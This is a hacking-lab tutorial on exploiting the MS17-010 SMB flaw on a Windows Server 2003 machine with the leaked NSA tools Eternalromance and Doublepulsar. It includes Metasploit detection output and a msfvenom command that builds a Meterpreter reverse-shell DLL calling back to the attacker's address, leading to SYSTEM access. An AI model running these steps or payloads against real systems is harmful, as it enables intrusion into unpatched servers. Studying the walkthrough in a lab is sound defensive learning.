This article is of an educational nature, using proof of concept in uncontrolled environments or without previous authorization could be illegal
This article is of an educational nature, using proof of concept in uncontrolled environments or without previous authorization could be illegal, In the previous article on NSA tools, we saw how it was possible to use Eternalblue and Doublepulsar to access Windows 7 remotely without requiring authentication through a vulnerability in the SMB protocol. In addition we saw how to configure the environment and tools needed to run this framework in the latest version of Kali.
Eternalromance is another exploit for version 1 of SMB, from the NSA vulnerability collection filtered and targeting Windows XP / Vista / 7 and Windows Server 2003 and 2008 systems. The exploit process is quite similar to Eternalblue except that we have to Use DoublePlay to pre-generate a shellcode that will be used by the Eternalromance exploit.
Next we leave the link to the previous chapter
Detect the MS17-010 vulnerability with Metasploit
It is possible to detect if the victim has the patch installed or not through the Metasploit module called MS17-010 SMB RCE Detection. This module connects to the IPC $ tree via SMB and attempts a transaction with FID 0. If it is “STATUS_INSUFF_SERVER_RESOURCES” returned status, the victim still does not have the MS17-010 patch installed, however, if the state that the server returns is ” STATUS_ACCESS_DENIED “or” STATUS_INVALID_HANDLE “, is that the target has fixed the vulnerability.
Also we can take into account that this module allows us to detect if the host was infected with DoublePulsar.
msf auxiliary(smb_ms17_010) > set rhosts 10.28.0.183
rhosts => 10.28.0.183
msf auxiliary(smb_ms17_010) > run
[+] 10.28.0.183:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2003 3790 Service Pack 1) ------------ Vulnerable Server
[!] 10.28.0.183:445 - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0xE260FDE5 -------------- Proof of which host was infected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) >
If we analyse the output we can see that the command executed shows that the Windows 2003 Service Pack 1 server is vulnerable, and also that it was previously infected with Doublepulsar. As we indicated above this module allows us to know if the victim was already injected.
Preparing the environment with Kali.
The time has come to prepare the Kali environment, and for this again we are going to use the Hacking Lab we have available to our students. Then, the steps to have everything ready in our environment and to be able to access the server with Windows 2003 SP1, we remember that the version of Kali is 2017.1, updated from the 2016 version, the same one that we used in the previous POC.
We need a server on the network with Windows 2003 SP1 Enterprise.
- Kali, the attacker, from where we will launch FuzzBunch with Wine.
If we are connected to the Hacking Lab, our attack scenario will be the following:
- Windows 2003 SP1 victim – 10.28.0.183
- Kali – 10.28.0.28
Extract with doublepulsar the shellcode in bin format
Before running Eternalromance we must generate the shellcode in binary with Doublepulsar. For this we use the function OutputInstall where we indicate where we want to store the binary file with the shellcode, this shellcode will be used together with Eternalromance to exploit and infect the victim.
When the backdoor is installed then we can inject into a process running with the user SYSTEM our DLL specially created with mfvenom. For the present case we have created a reverse shell with Meterpreter.
Let’s continue with the steps of exploitation. The first step is to start Fuzzbunch and complete the fields that are requested, the following image is a sample with the data completed.
Figure 1 – Target configuration
The next step is to create a new project, this action is similar to the Metasploit workspace.
Figure 2 – We create the project
Next we have to specify some configurations of variables like the architecture, the protocol and the output file. For our lab configuration, we can leave most of the default options because the target architecture is 32-bit x86, the target protocol is SMB and we just need to output the shellcode as a binary file. The only parameter that we must modify is the parameter OutPutFile where we indicate the complete path of the output file. “C: \ NSA \ shell.bin”
Figure 3 – Save shell in binary
Figure 4 – Plugin configuration and success in executed command
As shown in the image everything was apparently successful therefore the BIN file with the shellcode was generated in the specified location:
Figure 5 – Generated file
Use the Smbtouch plugin
Before configuring Eternalromance and running the exploit we must tell you that we are going to use Smbtouch and the binary shell we obtained previously. If we try to enter a different shellcode, an exception will occur in memory and the server will restart due to a DOS.
Figure 6 – Uploaded Plugin
The procedure from here forward is very similar to the one we saw in the previous article, the first step is to run the exploit and notice that the Smbtouch plugin is loaded. The following image shows an example where it is shown that we are making use of Smbtouch.
Figure 7 – Smbtouch Loaded in Eternalromance
It is important to be aware when we are asked for the shellcode that we want to include in the exploit so that a denial of service on the server does not occur. We will continue with all the default parameters except the “ShellcodeFile” parameter, where we will indicate the file that we obtained in the first phase with Doublepulsar, the .BIN file.
Figure 8 – Upload the previously created BIN file
Once the path is configured we continue with the process, where we will be asked about the exploit method that we want to use and we will also be asked about the version of the server that we are attacking, in our case we leave all the options by default.
Figure 9 – Exploit Options
Figure 10 – Final Configuration
We click on continue and our back door will have been installed successfully without causing a denial of service.
Use Doublepulsar to inject our DLL
The next step is to take advantage of the Eternalromance exploit and the BINARY previously created with Doublepulsar to load and inject a library into a system process.
Then I write again the steps to create the library with msfvenom that we will use to create the shell
# We opened a terminal
# We create a folder where the shell.dll is stored
# We create our shell with a meterpreter, which we will inject
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.28.0.28 LPORT=443 -f dll> shell.dll
# Once we have the shell ready to be injected into a Windows process, we proceed to prepare the Metasploit environment to receive the connection.
set lhost 10.28.0.28
set lport 443
Figure 11 – Configure Metasploit
Once everything is ready we proceed to run Doublepulsar again, but unlike the previous time, we now indicate that we want to inject a DLL and select the “RunDLL” option indicating the path where our DLL library is with the Meterpreter created with msfvenom , The following image shows the final configuration.
Figure 12 – Final configuration before receiving the shell
As a result of our well-done work we will have the server shell 10.28.0.183, with the SYSTEM privileges on a Windows 2003 SP1 server
Figure 12 – Doublepulsar successfully executed and shell in Metasploit
Video POC – https://youtu.be/gDZcpRbxjCM